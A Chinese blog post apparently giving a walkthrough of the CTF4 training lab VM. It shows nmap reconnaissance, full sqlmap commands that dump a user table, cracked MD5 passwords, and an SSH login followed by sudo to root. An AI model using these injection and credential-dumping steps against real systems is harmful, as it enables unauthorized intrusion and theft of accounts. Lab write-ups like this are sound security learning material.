首页
小工具
IP查询API
UserAgent查询API
二维码生成API
在线文件转base64
Linux命令搜索
Myluzh Blog
CTF4靶机渗透测试笔记
发布时间: 2020-2-25 文章作者:
myluzh
分类名称:
SECURE
朗读文章
0x01初步探测
CTF4靶机导入虚拟机后,直接使用netdiscover命令扫描,找到靶机。
nmap命令扫描目标靶机端口,看看有哪些端口开放 可以看到80http 22ssh 25smtp端口开着
0x02查找漏洞
直接访问http地址,发现好像能sql注入
0x03 sql注入
sqlmap跑下数据库(其实没什么必要)
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dbs
跑下数据表
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --tables
发现有个user表,直接跑user表字段
#
sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --columns -T "user"
直接爆用户跟密码
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dump -T "user" -C "user_id,user_name,user_pass"
sql注入利用完成,成功拿到账号密码
0x04账号利用
爆出来的用户密码可以看出都是md5加密的,前面几条密文解密要收费,免费的查出来了两条
用户dstevens密码02e823a15a392b5aa4ff4ccb9060fa68 (查询结果
ilike2surf
)
用户ghighland密码9f3eb3087298ff21843cc4e013cf355f (查询结果undone1)
dirb扫了下网站目录,有个admin目录,直接用上面爆出来的账号登陆进去,发现没上面用,只有一个文本框,测试了以下xss也是能触发成功的。但没什么用。
到此,我就没思路了,然后看了下writeup,原来直接拿账号密码登陆ssh,我竟然把这给忘,直接拿上面的账号密码登陆ssh,
用户dstevens密码
ilike2surf,
用户ghighland密码undone1
这两个都试了
,但是权限不够。
又看了一波writeup,原来直接用爆出来的第一个账号(账号
dstevens密码02e823a15a392b5aa4ff4ccb9060fa68 (解密ilike2surf)
),登陆后用sudo命令就是root权限了。谁叫我没钱给第一个密文解密呢。成功提权,结束。
0x05总结
靶机难度其实不高,但是渗透过程中也不是特别顺利,有点坑比如说用dirb扫出来很多东西,但是能利用的却没有,在这个上面浪费了时间,然后就是没想到这个密码直接能登陆ssh,ssh这里还是需要注意下的。
靶机下载magnet:?xt=urn:btih:E7567516ADC9617E8CB969F59BF3430EF514DEA6
标签:
渗透
靶机
ctf
«
Linux grep命令 查找目录中文件的内容
|
VMware虚拟机三种网络模式:桥接模式,NAT模式,仅主机模式
»
取消回复
发表评论
昵称
邮件地址 (选填)
个人主页 (选填)
手机扫一扫访问
搜索内容
热门文章
VMware vCenter vSphere ESXi 7.0 许可证&下载链接
DS918+,DS3617xs黑群晖洗白码
黑群晖各版本引导下载
Kali Liunx下msfvenom利用方法
python base64加解密脚本(可变换码表)
Kali Liunx字典生成工具Crunch,Cupp,Cewl
解决VM虚拟机Kali Liunx连不上网
JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记
最新文章
修复VMware ESXi未向DHCP服务器注册主机名
K8S 使用临时容器(Ephemeral Containers)
Prometheus 监控 ingress-nginx 性能指标
Prometheus 监控 Java 应用和 JVM 性能指标
Prometheus 自动发现 K8S Ingress 下的域名进行黑盒监控
Prometheus 在 K8S 集群中自动发现常用角色(Role)的解释
K8S 使用Local Path Storage(本地路径存储)
Alertmanager 企业微信告警配置 自定义告警模板
最新评论
ID:
myluzh
@顶顶顶:https://www.ela...
ID:
顶顶顶
版本对应关系去哪看呢
ID:
冬天里的火
可以,现在弄k8s 的越来越多了,确实都...
友情链接
Exploit-db
linux-kernel-exploits
日期存档
2024年12月(2)
2024年11月(8)
2024年10月(8)
2024年9月(6)
2024年8月(2)
2024年7月(7)
2024年6月(1)
2024年5月(6)
2024年4月(1)
2024年3月(3)
2024年2月(6)
2024年1月(11)
2023年12月(13)
2023年11月(14)
2023年10月(8)
2023年9月(11)
2023年8月(4)
2023年7月(18)
2023年6月(16)
2023年5月(16)
2023年4月(4)
2023年3月(7)
2023年2月(26)
2023年1月(10)
2022年12月(7)
2022年11月(2)
2022年10月(5)
2022年9月(8)
2022年8月(9)
2022年7月(4)
2022年6月(3)
2022年5月(3)
2022年4月(3)
2022年3月(7)
2022年2月(1)
2022年1月(2)
2021年12月(6)
2021年11月(3)
2021年10月(5)
2021年9月(8)
2021年8月(3)
2021年7月(3)
2021年6月(3)
2021年5月(3)
2021年4月(4)
2021年3月(3)
2021年2月(1)
2021年1月(1)
2020年12月(8)
2020年11月(6)
2020年10月(1)
2020年9月(3)
2020年8月(1)
2020年7月(5)
2020年6月(1)
2020年5月(2)
2020年4月(7)
2020年3月(20)
2020年2月(12)
2020年1月(3)
2010年10月(3)
WeChat
发表评论